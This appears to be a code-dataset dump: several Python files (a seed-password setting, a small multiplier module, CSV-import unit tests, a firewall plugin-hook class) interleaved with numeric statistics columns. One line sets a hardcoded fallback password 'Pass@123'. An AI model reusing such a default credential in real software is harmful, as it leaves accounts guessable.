SEED_DEFAULT_PASSWORD = env("SEED_DEFAULT_PASSWORD", default="Pass@123")
| 27.4
| 72
| 0.79562
| 21
| 137
| 5
| 0.666667
| 0.209524
| 0.361905
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02459
| 0.109489
| 137
| 4
| 73
| 34.25
| 0.836066
| 0.189781
| 0
| 0
| 0
| 0
| 0.266055
| 0.192661
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.5
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
|
0
| 6
|
2973e94847ea74f19a48097bd62bd29dec3524a4
| 91
|
py
|
Python
|
7_Modules/Package1/Package1_1/ModuleTest.py
|
Oscar-Oliveira/Python3
|
fa791225a6810b75890d24407b73c5e1b514acbe
|
[
"MIT"
] | null | null | null |
7_Modules/Package1/Package1_1/ModuleTest.py
|
Oscar-Oliveira/Python3
|
fa791225a6810b75890d24407b73c5e1b514acbe
|
[
"MIT"
] | null | null | null |
7_Modules/Package1/Package1_1/ModuleTest.py
|
Oscar-Oliveira/Python3
|
fa791225a6810b75890d24407b73c5e1b514acbe
|
[
"MIT"
] | null | null | null |
"""
Module
"""
def my_multiplier(value1, value2):
return value1 * value2 * 1000
| 13
| 35
| 0.615385
| 10
| 91
| 5.5
| 0.8
| 0.436364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 0.252747
| 91
| 6
| 36
| 15.166667
| 0.691176
| 0.065934
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
462406933a0df9e604be174a72c14431607962b5
| 22,485
|
py
|
Python
|
django_project/src/imports/processing/tests.py
|
icrc-fdeniger/waterboard
|
10d95b15938b495f4c83c6e125cbb6a2ba41e506
|
[
"MIT"
] | 1
|
2019-01-19T09:01:48.000Z
|
2019-01-19T09:01:48.000Z
|
django_project/src/imports/processing/tests.py
|
icrc-fdeniger/waterboard
|
10d95b15938b495f4c83c6e125cbb6a2ba41e506
|
[
"MIT"
] | 32
|
2017-12-15T14:35:17.000Z
|
2022-03-11T23:16:10.000Z
|
django_project/src/imports/processing/tests.py
|
icrc-fdeniger/waterboard
|
10d95b15938b495f4c83c6e125cbb6a2ba41e506
|
[
"MIT"
] | 4
|
2019-02-13T07:52:05.000Z
|
2021-04-29T08:20:58.000Z
|
# -*- coding: utf-8 -*-
import unittest
from .errors import FileError, MultipleUuidError, NoRequiredColumnError, UnnamedColumnError
from .functions import check_data, check_file_header, check_headers, for_insert, for_update, parse_data_file
class TestCSVImport(unittest.TestCase):
def test_checkFileHeader_emptyFile(self):
data_raw = []
self.assertRaises(FileError, check_file_header, data_raw)
def test_checkFileHeader_emptyFirstRow(self):
data_raw = [[None, None, None], ['1', '2', '3']]
self.assertRaises(FileError, check_file_header, data_raw)
def test_checkFileHeader_columnsWithoutName(self):
data_raw = [['a', None, 'b'], ['1', '2', '3']]
self.assertRaises(UnnamedColumnError, check_file_header, data_raw)
def test_getDataFile_checkNew(self):
data_raw = [
['feature_uuid', 'a', 'b'],
['uuid1', 'x', 'y'],
['', 'xy', 'yz'],
['', 'ab', 'bc'],
['', '', ''],
[None, '', ''],
['uuid2', 'x', 'y']
]
expected_result = (
['feature_uuid', 'a', 'b'], {
'uuid1': {'feature_uuid': 'uuid1', 'a': 'x', 'b': 'y'},
'uuid2': {'feature_uuid': 'uuid2', 'a': 'x', 'b': 'y'},
'new_feature_uuid_1': {'feature_uuid': 'new_feature_uuid_1', 'a': 'xy', 'b': 'yz'},
'new_feature_uuid_2': {'feature_uuid': 'new_feature_uuid_2', 'a': 'ab', 'b': 'bc'},
'new_feature_uuid_3': {'feature_uuid': 'new_feature_uuid_3', 'a': None, 'b': None},
'new_feature_uuid_4': {'feature_uuid': 'new_feature_uuid_4', 'a': None, 'b': None}
}
)
self.assertEqual(parse_data_file(data_raw), expected_result)
def test_getDataFile_multipleUuid(self):
data_raw = [['feature_uuid', 'a', 'b'], ['uuid1', 'x', 'y'], ['uuid1', 'xy', 'yz'], ['uuid2', 'x', 'y']]
self.assertRaises(MultipleUuidError, parse_data_file, data_raw)
def test_getDataFile_ignoredAttributes(self):
data_raw = [['feature_uuid', 'a', 'email', 'changeset'], ['uuid1', 'x', 'y', 1], ['uuid2', 'x', 'y', 2]]
expected_result = (['feature_uuid', 'a'], {
'uuid1': {'feature_uuid': 'uuid1', 'a': 'x', 'changeset': 1},
'uuid2': {'feature_uuid': 'uuid2', 'a': 'x', 'changeset': 2}
})
self.assertEqual(parse_data_file(data_raw), expected_result)
def test_check_headers_areSame(self):
header_file = ['col1', 'col2', 'col3']
header_db = ['col1', 'col3', 'col2']
attributes = {'col1': {'required': False}, 'col2': {'required': False}, 'col3': {'required': True}}
self.assertEqual(check_headers(header_file, header_db, attributes), [])
def test_check_headers_moreInFile(self):
header_file = ['col1', 'col2', 'col3', 'col4', 'col5']
header_db = ['col1', 'col3', 'col2']
attributes = {'col1': {'required': False}, 'col2': {'required': False}, 'col3': {'required': True}}
self.assertEqual(check_headers(header_file, header_db, attributes), [
'Column "col4" in uploaded file is not defined in database. Data will be inserted in database without '
'values in column "col4".',
'Column "col5" in uploaded file is not defined in database. Data will be inserted in database without '
'values in column "col5".'])
def test_check_headers_lessInFile_notRequired(self):
header_file = ['col1', 'col2', 'col3']
header_db = ['col1', 'col3', 'col2', 'col4']
attributes = {'col1': {'required': False}, 'col2': {'required': False}, 'col3': {'required': True}}
self.assertEqual(check_headers(header_file, header_db, attributes), [])
def test_check_headers_lessInFile_required_one(self):
header_file = ['col1', 'col2']
header_db = ['col1', 'col3', 'col2', 'col4']
attributes = {'col1': {'required': False}, 'col2': {'required': False}, 'col3': {'required': True}}
self.assertRaises(NoRequiredColumnError, check_headers, header_file, header_db, attributes)
def test_check_headers_lessInFile_required_two(self):
header_file = ['col1']
header_db = ['col1', 'col3', 'col2', 'col4']
attributes = {'col1': {'required': False}, 'col2': {'required': True}, 'col3': {'required': True}}
self.assertRaises(NoRequiredColumnError, check_headers, header_file, header_db, attributes)
def test_check_headers_lessInFile_required_three(self):
header_file = ['col1']
header_db = ['col1', 'col3', 'col2', 'col4']
attributes = {'col1': {'required': False}, 'col2': {'required': True}, 'col3': {'required': True},
'col4': {'required': True}}
self.assertRaises(NoRequiredColumnError, check_headers, header_file, header_db, attributes)
def test_for_update_sameRows(self):
row_file = {'a': '123', 'b': 123, 'c': 'abc'}
row_db = {'a': '123', 'b': 123, 'c': 'abc'}
self.assertFalse(for_update(row_file, row_db))
def test_for_update_differentRows(self):
row_file = {'a': '123', 'b': 123, 'c': 'ab'}
row_db = {'a': '123', 'b': 123, 'c': 'abc'}
self.assertTrue(for_update(row_file, row_db))
def test_for_update_moreRowsInFile(self):
row_file = {'a': '123', 'b': 123, 'c': 'abc', 'd': 'abc'}
row_db = {'a': '123', 'b': 123, 'c': 'abc'}
self.assertFalse(for_update(row_file, row_db))
def test_for_update_moreRowsInDB(self):
row_file = {'a': '123', 'b': 123, 'c': 'abc'}
row_db = {'a': '123', 'b': 123, 'c': 'abc', 'd': 'abc'}
self.assertFalse(for_update(row_file, row_db))
def test_for_insert_inDropdown(self):
index_row = 3
row = {'a': 'abc'}
attributes = {'a': {'type': 'DropDown', 'required': False, 'id': '1', 'options': ['abc', 'Eastern']}}
self.assertEqual(for_insert(index_row, row, attributes), (True, ''))
def test_for_insert_notInDropdown(self):
index_row = 3
row = {'a': 'abc1'}
attributes = {'a': {'type': 'DropDown', 'required': False, 'id': '1', 'options': ['abc', 'Eastern']}}
self.assertEqual(
for_insert(index_row, row, attributes),
(False, 'Row 3: value in column "a" is not allowed (it should be one of the predefined values).')
)
def test_for_insert_isInteger(self):
index_row = 3
row = {'a': 1}
attributes = {'a': {'type': 'Integer', 'required': False, 'id': '1'}}
self.assertEqual(for_insert(index_row, row, attributes), (True, ''))
def test_for_insert_isNotInteger(self):
index_row = 3
row = {'a': 1.2}
attributes = {'a': {'type': 'Integer', 'required': False, 'id': '1'}}
self.assertEqual(
for_insert(index_row, row, attributes),
(False, 'Row 3: value in column "a" is not allowed (it should be a whole number).')
)
def test_for_insert_isDecimal(self):
index_row = 3
row = {'a': 1.2}
attributes = {'a': {'type': 'Decimal', 'required': False, 'id': '1'}}
self.assertEqual(for_insert(index_row, row, attributes), (True, ''))
def test_for_insert_isNotDecimal(self):
index_row = 3
row = {'a': '1.2'}
attributes = {'a': {'type': 'Decimal', 'required': False, 'id': '1'}}
self.assertEqual(
for_insert(index_row, row, attributes),
(False, 'Row 3: value in column "a" is not allowed (it should be a decimal number).')
)
def test_for_insert_required_notEmpty(self):
index_row = 3
row = {'a': 1.2}
attributes = {'a': {'type': 'Decimal', 'required': True}}
self.assertEqual(for_insert(index_row, row, attributes), (True, ''))
def test_for_insert_required_empty(self):
index_row = 3
row = {'a': None, 'b': 1}
attributes = {'a': {'type': 'Decimal', 'required': True, 'id': '1'}}
self.assertEqual(for_insert(index_row, row, attributes), (False, 'Row 3: value in column "a" is missing.'))
def test_for_insert_multipleErrors(self):
index_row = 3
row = {'a': None, 'b': 'abc', 'c': 'x'}
attributes = {'a': {'type': 'Decimal', 'required': True},
'b': {'type': 'Decimal', 'required': True},
'c': {'type': 'DropDown', 'required': True, 'id': '1', 'options': ['abc', 'Eastern']}}
expected_result = (
False, (
'Row 3: value in column "a" is missing, value in column "b" is not allowed (it should '
'be a decimal number), value in column "c" is not allowed (it should be one of the '
'predefined values).'
)
)
self.assertEqual(for_insert(index_row, row, attributes), expected_result)
def test_check_data_empty_rows(self):
data_file = {
'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, '653bnj': {'a': 98, 'b': 'cba', 'c': 1.57},
'new_feature_uuid_1': {'feature_uuid': 'new_feature_uuid_1', 'a': None, 'b': None},
'new_feature_uuid_2': {'feature_uuid': 'new_feature_uuid_2', 'a': None, 'c': None}
}
data_db = {'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, '653bnj': {'a': 98, 'b': 'cba', 'c': 1.57}}
attributes = {'a': {'type': 'Integer', 'required': False, 'id': '1'},
'b': {'type': 'DropDown', 'required': False, 'id': '1', 'options': ['abc', 'Eastern']},
'c': {'type': 'Decimal', 'required': False, 'id': '1'}}
self.assertEqual(
check_data(data_file, data_db, attributes), (
[
{'a': None, 'b': None, 'feature_uuid': 'new_feature_uuid_1'},
{'a': None, 'c': None, 'feature_uuid': 'new_feature_uuid_2'}
],
[], [], [], {
'num_add': 2, 'num_discarded': 0, 'num_needs_correction': 0, 'num_unchanged': 2, 'num_update': 0
}
)
)
def test_check_data_no_change(self):
data_file = {'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, '653bnj': {'a': 98, 'b': 'cba', 'c': 1.57}}
data_db = {'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, '653bnj': {'a': 98, 'b': 'cba', 'c': 1.57}}
attributes = {'a': {'type': 'Integer', 'required': True, 'id': '1'},
'b': {'type': 'DropDown', 'required': True, 'id': '1', 'options': ['abc', 'Eastern']},
'c': {'type': 'Decimal', 'required': True, 'id': '1'}}
self.assertEqual(
check_data(data_file, data_db, attributes),
([], [], [], [], {
'num_add': 0, 'num_discarded': 0, 'num_needs_correction': 0, 'num_unchanged': 2, 'num_update': 0
})
)
def test_check_data_oneForAdd(self):
data_file = {
'453abc': {'a': 123, 'b': 'abc', 'c': 1.23}, 'new_feature_uuid_1': {'a': 98, 'b': 'abc', 'c': 1.57}
}
data_db = {'453abc': {'a': 123, 'b': 'abc', 'c': 1.23}, '653bnj': {'a': 98, 'b': 'abc', 'c': 1.57}}
attributes = {'a': {'type': 'Integer', 'required': True, 'id': '1'},
'b': {'type': 'DropDown', 'required': True, 'id': '1', 'options': ['abc', 'Eastern']},
'c': {'type': 'Decimal', 'required': True, 'id': '1'}}
self.assertEqual(
check_data(data_file, data_db, attributes), (
[{'a': 98, 'b': 'abc', 'c': 1.57}], [], [], [], {
'num_add': 1, 'num_discarded': 0, 'num_needs_correction': 0, 'num_unchanged': 1, 'num_update': 0
}
)
)
def test_check_data_oneForUpdate(self):
data_file = {'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, '653bnj': {'a': 98, 'b': 'cba', 'c': 1.58}}
data_db = {'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, '653bnj': {'a': 98, 'b': 'cba', 'c': 1.57}}
attributes = {'a': {'type': 'Integer', 'required': True, 'id': '1'},
'b': {'type': 'DropDown', 'required': True, 'id': '1', 'options': ['cba', 'xyz']},
'c': {'type': 'Decimal', 'required': True, 'id': '1'}}
self.assertEqual(
check_data(data_file, data_db, attributes), (
[], [{'a': 98, 'b': 'cba', 'c': 1.58}], [], [], {
'num_add': 0, 'num_discarded': 0, 'num_needs_correction': 0, 'num_unchanged': 1, 'num_update': 1
}
)
)
def test_check_data_oneDiscarded(self):
data_file = {'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, 'AAA': {'a': 98, 'b': 'cba', 'c': 1.57}}
data_db = {'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, '653bnj': {'a': 98, 'b': 'cba', 'c': 1.57}}
attributes = {'a': {'type': 'Integer', 'required': True, 'id': '1'},
'b': {'type': 'DropDown', 'required': True, 'id': '1', 'options': ['cba', 'xyz']},
'c': {'type': 'Decimal', 'required': True, 'id': '1'}}
self.assertEqual(
check_data(data_file, data_db, attributes), (
[], [], [], ['Row 3 was discarded. (feature_uuid not in database or not blank)'],
{'num_add': 0, 'num_discarded': 1, 'num_needs_correction': 0, 'num_unchanged': 1, 'num_update': 0}
)
)
def test_check_data_oneUpdate_oneWith3Errors_oneDiscarded_oneForAdd(self):
data_file = {'453abc': {'a': 1234, 'b': 'xyz', 'c': 1.23}, '653bnj': {'a': 1.2, 'b': 'abc', 'c': None},
'ABC': {'a': 98, 'b': 'xyz', 'c': 1.2}, 'new_feature_uuid_1': {'a': 98, 'b': 'cba', 'c': 1.2}}
data_db = {'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, '653bnj': {'a': 98, 'b': 'cba', 'c': 1.57}}
attributes = {'a': {'type': 'Integer', 'required': True, 'id': '1'},
'b': {'type': 'DropDown', 'required': True, 'id': '1', 'options': ['cba', 'xyz']},
'c': {'type': 'Decimal', 'required': True, 'id': '1'}}
expected_result = (
[{'a': 98, 'b': 'cba', 'c': 1.2}], [{'a': 1234, 'b': 'xyz', 'c': 1.23}], [], [
'Row 3: value in column "a" is not allowed (it should be a whole number), value in column "b" is not '
'allowed (it should be one of the predefined values), value in column "c" is missing.',
'Row 4 was discarded. (feature_uuid not in database or not blank)'
],
{'num_add': 1, 'num_discarded': 1, 'num_needs_correction': 1, 'num_unchanged': 0, 'num_update': 1}
)
self.assertEqual(check_data(data_file, data_db, attributes), expected_result)
def test_check_data_oneForAddWithError(self):
data_file = {'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, 'new_feature_uuid_1': {'a': 1.2, 'b': 'cba', 'c': 2}}
data_db = {'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, '653bnj': {'a': 98, 'b': 'cba', 'c': 1.57}}
attributes = {'a': {'type': 'Integer', 'required': True, 'id': '1'},
'b': {'type': 'DropDown', 'required': True, 'id': '1', 'options': ['cba', 'xyz']},
'c': {'type': 'Decimal', 'required': True, 'id': '1'}}
expected_result = (
[], [], [], ['Row 3: value in column "a" is not allowed (it should be a whole number).'],
{'num_add': 0, 'num_discarded': 0, 'num_needs_correction': 1, 'num_unchanged': 1, 'num_update': 0}
)
self.assertEqual(check_data(data_file, data_db, attributes), expected_result)
def test_check_data_twoForAdd_noError(self):
data_file = {
'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23},
'new_feature_uuid_1': {'a': 1, 'b': 'cba', 'c': 2},
'new_feature_uuid_2': {'a': 2, 'b': 'xyz', 'c': 2}
}
data_db = {
'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23},
'653bnj': {'a': 98, 'b': 'cba', 'c': 1.57}
}
attributes = {
'a': {'type': 'Integer', 'required': True, 'id': '1'},
'b': {'type': 'DropDown', 'required': True, 'id': '1', 'options': ['cba', 'xyz']},
'c': {'type': 'Decimal', 'required': True, 'id': '1'}
}
self.assertEqual(
check_data(data_file, data_db, attributes), (
[{'a': 1, 'b': 'cba', 'c': 2}, {'a': 2, 'b': 'xyz', 'c': 2}], [], [], [], {
'num_add': 2, 'num_discarded': 0, 'num_needs_correction': 0, 'num_unchanged': 1, 'num_update': 0
}
)
)
def test_check_data_twoForAdd_withError(self):
data_from_file = {
'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, 'new_feature_uuid_1': {'a': 2, 'b': 'xyz', 'c': 2},
'new_feature_uuid_2': {'a': 1, 'b': 'aaa', 'c': 2}
}
data_from_db = {'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, '653bnj': {'a': 98, 'b': 'cba', 'c': 1.57}}
attributes = {'a': {'type': 'Integer', 'required': True, 'id': '1'},
'b': {'type': 'DropDown', 'required': True, 'id': '1', 'options': ['cba', 'xyz']},
'c': {'type': 'Decimal', 'required': True, 'id': '1'}}
expected_result = (
[{'a': 2, 'b': 'xyz', 'c': 2}], [], [], [
'Row 4: value in column "b" is not allowed (it should be one of the predefined values).'], {
'num_add': 1, 'num_discarded': 0, 'num_needs_correction': 1, 'num_unchanged': 1, 'num_update': 0
}
)
self.assertEqual(check_data(data_from_file, data_from_db, attributes), expected_result)
def test_check_data_three_discarded(self):
data_from_file = {
'a': {'a': 123, 'b': 'xyz', 'c': 1.23},
'b': {'a': 2, 'b': 'xyz', 'c': 2},
'c': {'a': 1, 'b': 'aaa', 'c': 2}}
data_from_db = {'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23}, '653bnj': {'a': 98, 'b': 'cba', 'c': 1.57}}
attributes = {'a': {'type': 'Integer', 'required': True, 'id': '1'},
'b': {'type': 'DropDown', 'required': True, 'id': '1', 'options': ['cba', 'xyz']},
'c': {'type': 'Decimal', 'required': True, 'id': '1'}}
self.assertEqual(
check_data(data_from_file, data_from_db, attributes), (
[], [], [], ['Rows 2, 3 and 4 were discarded. (feature_uuid not in database or not blank)'],
{'num_add': 0, 'num_discarded': 3, 'num_needs_correction': 0, 'num_unchanged': 0, 'num_update': 0}
)
)
def test_check_data_changeset_threeUpdate_oneAdd(self):
data_from_file = {
'453abc': {'a': 1, 'b': 'xyz', 'c': 2, 'changeset': '20'},
'653bnj': {'a': 1, 'b': 'xyz', 'c': 2, 'changeset': 20},
'556gbn': {'a': 1, 'b': 'xyz', 'c': 2},
'new_feature_uuid_1': {'a': 1, 'b': 'cba', 'c': 2, 'changeset': '7'}
}
data_from_db = {
'453abc': {'a': 123, 'b': 'xyz', 'c': 1.23, 'changeset_id': 20},
'653bnj': {'a': 123, 'b': 'xyz', 'c': 1.25, 'changeset_id': 20},
'556gbn': {'a': 123, 'b': 'xyz', 'c': 1.23, 'changeset_id': 20}
}
attributes = {
'a': {'type': 'Integer', 'required': True},
'b': {'type': 'DropDown', 'required': True, 'options': ['cba', 'xyz']},
'c': {'type': 'Decimal', 'required': True}
}
expected_result = (
[{'a': 1, 'b': 'cba', 'c': 2, 'changeset': '7'}],
[{'a': 1, 'b': 'xyz', 'c': 2, 'changeset': '20'}, {'a': 1, 'b': 'xyz', 'c': 2, 'changeset': 20},
{'a': 1, 'b': 'xyz', 'c': 2}], [], [], {
'num_add': 1, 'num_discarded': 0, 'num_needs_correction': 0, 'num_unchanged': 0, 'num_update': 3
})
self.assertEqual(check_data(data_from_file, data_from_db, attributes), expected_result)
def test_check_data_changeset_oneDiscarded_twoError(self):
data_from_file = {
'787nmj': {'a': 1, 'b': 'bbb', 'c': 2, 'changeset': '7'},
'789ght': {'a': 1, 'b': 'bbb', 'c': 2, 'changeset': 'a'},
'549uhj': {'a': 1, 'b': 'xyz', 'c': 2, 'changeset': 'a'}
}
data_from_db = {
'787nmj': {'a': 123, 'b': 'xyz', 'c': 1.23, 'changeset_id': 20},
'789ght': {'a': 123, 'b': 'xyz', 'c': 1.23, 'changeset_id': 20},
'549uhj': {'a': 123, 'b': 'xyz', 'c': 2, 'changeset_id': 20}
}
attributes = {
'a': {'type': 'Integer', 'required': True},
'b': {'type': 'DropDown', 'required': True, 'options': ['cba', 'xyz']},
'c': {'type': 'Decimal', 'required': True}
}
expected_result = ([], [], [], [(
'Row 3: value in column "b" is not allowed (it should be one of the predefined values), value in '
'column "changeset" is not allowed (it should be a whole number).'),
'Row 4: value in column "changeset" is not allowed (it should be a whole number).',
'Row 2 was discarded. (changeset is not the most recent one)'], {
'num_add': 0, 'num_discarded': 1, 'num_needs_correction': 2, 'num_unchanged': 0, 'num_update': 0
})
self.assertEqual(check_data(data_from_file, data_from_db, attributes), expected_result)
def test_check_data_changeset_oneAdd_twoUnchanged_oneDiscarded(self):
data_from_file = {
'908hnj': {'a': 1, 'b': 'aaa', 'c': 2, 'changeset': '7'},
'897bnj': {'a': 1, 'b': 'aaa', 'c': 2, 'changeset': '20'}
}
data_from_db = {
'908hnj': {'a': 1, 'b': 'aaa', 'c': 2, 'changeset_id': 20},
'897bnj': {'a': 1, 'b': 'aaa', 'c': 2, 'changeset_id': 20}
}
attributes = {
'a': {'type': 'Integer', 'required': True},
'b': {'type': 'DropDown', 'required': True, 'options': ['cba', 'xyz']},
'c': {'type': 'Decimal', 'required': True}
}
expected_result = (
[], [], [], ['Row 2 was discarded. (changeset is not the most recent one)'], {
'num_add': 0, 'num_discarded': 1, 'num_needs_correction': 0, 'num_unchanged': 1, 'num_update': 0
})
self.assertEqual(check_data(data_from_file, data_from_db, attributes), expected_result)
if __name__ == '__main__':
unittest.main()
| 47.336842
| 119
| 0.506427
| 2,718
| 22,485
| 3.996689
| 0.066593
| 0.055233
| 0.017491
| 0.040044
| 0.874804
| 0.842953
| 0.80429
| 0.771518
| 0.739575
| 0.709012
| 0
| 0.048375
| 0.277385
| 22,485
| 474
| 120
| 47.436709
| 0.620199
| 0.000934
| 0
| 0.394737
| 0
| 0.015789
| 0.267563
| 0
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0.1
| false
| 0
| 0.010526
| 0
| 0.113158
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
463afbd78683c87845fac6bedfa6cb0506f041fe
| 6,781
|
py
|
Python
|
firewall/pluginManager.py
|
uzairAK/serverom-panel
|
3dcde05ad618e6bef280db7d3180f926fe2ab1db
|
[
"MIT"
] | null | null | null |
firewall/pluginManager.py
|
uzairAK/serverom-panel
|
3dcde05ad618e6bef280db7d3180f926fe2ab1db
|
[
"MIT"
] | null | null | null |
firewall/pluginManager.py
|
uzairAK/serverom-panel
|
3dcde05ad618e6bef280db7d3180f926fe2ab1db
|
[
"MIT"
] | null | null | null |
from .signals import *
from plogical.pluginManagerGlobal import pluginManagerGlobal
class pluginManager:
@staticmethod
def preFirewallHome(request):
return pluginManagerGlobal.globalPlug(request, preFirewallHome)
@staticmethod
def postFirewallHome(request, response):
return pluginManagerGlobal.globalPlug(request, postFirewallHome, response)
@staticmethod
def preAddRule(request):
return pluginManagerGlobal.globalPlug(request, preAddRule)
@staticmethod
def postAddRule(request, response):
return pluginManagerGlobal.globalPlug(request, postAddRule, response)
@staticmethod
def preDeleteRule(request):
return pluginManagerGlobal.globalPlug(request, preDeleteRule)
@staticmethod
def postDeleteRule(request, response):
return pluginManagerGlobal.globalPlug(request, postDeleteRule, response)
@staticmethod
def preReloadFirewall(request):
return pluginManagerGlobal.globalPlug(request, preReloadFirewall)
@staticmethod
def postReloadFirewall(request, response):
return pluginManagerGlobal.globalPlug(request, postReloadFirewall, response)
@staticmethod
def preStartFirewall(request):
return pluginManagerGlobal.globalPlug(request, preStartFirewall)
@staticmethod
def postStartFirewall(request, response):
return pluginManagerGlobal.globalPlug(request, postStartFirewall, response)
@staticmethod
def preStopFirewall(request):
return pluginManagerGlobal.globalPlug(request, preStopFirewall)
@staticmethod
def postStopFirewall(request, response):
return pluginManagerGlobal.globalPlug(request, postStopFirewall, response)
@staticmethod
def preFirewallStatus(request):
return pluginManagerGlobal.globalPlug(request, preFirewallStatus)
@staticmethod
def postFirewallStatus(request, response):
return pluginManagerGlobal.globalPlug(request, postFirewallStatus, response)
@staticmethod
def preSecureSSH(request):
return pluginManagerGlobal.globalPlug(request, preSecureSSH)
@staticmethod
def postSecureSSH(request, response):
return pluginManagerGlobal.globalPlug(request, postSecureSSH, response)
@staticmethod
def preSaveSSHConfigs(request):
return pluginManagerGlobal.globalPlug(request, preSaveSSHConfigs)
@staticmethod
def postSaveSSHConfigs(request, response):
return pluginManagerGlobal.globalPlug(request, postSaveSSHConfigs, response)
@staticmethod
def preDeleteSSHKey(request):
return pluginManagerGlobal.globalPlug(request, preDeleteSSHKey)
@staticmethod
def postDeleteSSHKey(request, response):
return pluginManagerGlobal.globalPlug(request, postDeleteSSHKey, response)
@staticmethod
def preAddSSHKey(request):
return pluginManagerGlobal.globalPlug(request, preAddSSHKey)
@staticmethod
def postAddSSHKey(request, response):
return pluginManagerGlobal.globalPlug(request, postAddSSHKey, response)
@staticmethod
def preLoadModSecurityHome(request):
return pluginManagerGlobal.globalPlug(request, preLoadModSecurityHome)
@staticmethod
def postLoadModSecurityHome(request, response):
return pluginManagerGlobal.globalPlug(request, postLoadModSecurityHome, response)
@staticmethod
def preSaveModSecConfigurations(request):
return pluginManagerGlobal.globalPlug(request, preSaveModSecConfigurations)
@staticmethod
def postSaveModSecConfigurations(request, response):
return pluginManagerGlobal.globalPlug(request, postSaveModSecConfigurations, response)
@staticmethod
def preModSecRules(request):
return pluginManagerGlobal.globalPlug(request, preModSecRules)
@staticmethod
def postModSecRules(request, response):
return pluginManagerGlobal.globalPlug(request, postModSecRules, response)
@staticmethod
def preSaveModSecRules(request):
return pluginManagerGlobal.globalPlug(request, preSaveModSecRules)
@staticmethod
def postSaveModSecRules(request, response):
return pluginManagerGlobal.globalPlug(request, postSaveModSecRules, response)
@staticmethod
def preModSecRulesPacks(request):
return pluginManagerGlobal.globalPlug(request, preModSecRulesPacks)
@staticmethod
def postModSecRulesPacks(request, response):
return pluginManagerGlobal.globalPlug(request, postModSecRulesPacks, response)
@staticmethod
def preGetOWASPAndComodoStatus(request):
return pluginManagerGlobal.globalPlug(request, preGetOWASPAndComodoStatus)
@staticmethod
def postGetOWASPAndComodoStatus(request, response):
return pluginManagerGlobal.globalPlug(request, postGetOWASPAndComodoStatus, response)
@staticmethod
def preInstallModSecRulesPack(request):
return pluginManagerGlobal.globalPlug(request, preInstallModSecRulesPack)
@staticmethod
def postInstallModSecRulesPack(request, response):
return pluginManagerGlobal.globalPlug(request, postInstallModSecRulesPack, response)
@staticmethod
def preGetRulesFiles(request):
return pluginManagerGlobal.globalPlug(request, preGetRulesFiles)
@staticmethod
def postGetRulesFiles(request, response):
return pluginManagerGlobal.globalPlug(request, postGetRulesFiles, response)
@staticmethod
def preEnableDisableRuleFile(request):
return pluginManagerGlobal.globalPlug(request, preEnableDisableRuleFile)
@staticmethod
def postEnableDisableRuleFile(request, response):
return pluginManagerGlobal.globalPlug(request, postEnableDisableRuleFile, response)
@staticmethod
def preCSF(request):
return pluginManagerGlobal.globalPlug(request, preCSF)
@staticmethod
def postCSF(request, response):
return pluginManagerGlobal.globalPlug(request, postCSF, response)
@staticmethod
def preChangeStatus(request):
return pluginManagerGlobal.globalPlug(request, preChangeStatus)
@staticmethod
def postChangeStatus(request, response):
return pluginManagerGlobal.globalPlug(request, postChangeStatus, response)
@staticmethod
def preModifyPorts(request):
return pluginManagerGlobal.globalPlug(request, preModifyPorts)
@staticmethod
def postModifyPorts(request, response):
return pluginManagerGlobal.globalPlug(request, postModifyPorts, response)
@staticmethod
def preModifyIPs(request):
return pluginManagerGlobal.globalPlug(request, preModifyIPs)
@staticmethod
def postModifyIPs(request, response):
return pluginManagerGlobal.globalPlug(request, postModifyIPs, response)
| 34.596939
| 94
| 0.764342
| 490
| 6,781
| 10.577551
| 0.12449
| 0.138916
| 0.324137
| 0.388964
| 0.490835
| 0.26394
| 0
| 0
| 0
| 0
| 0
| 0
| 0.171361
| 6,781
| 196
| 95
| 34.596939
| 0.922406
| 0
| 0
| 0.326531
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.326531
| false
| 0
| 0.013605
| 0.326531
| 0.673469
| 0
| 0
| 0
| 1
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
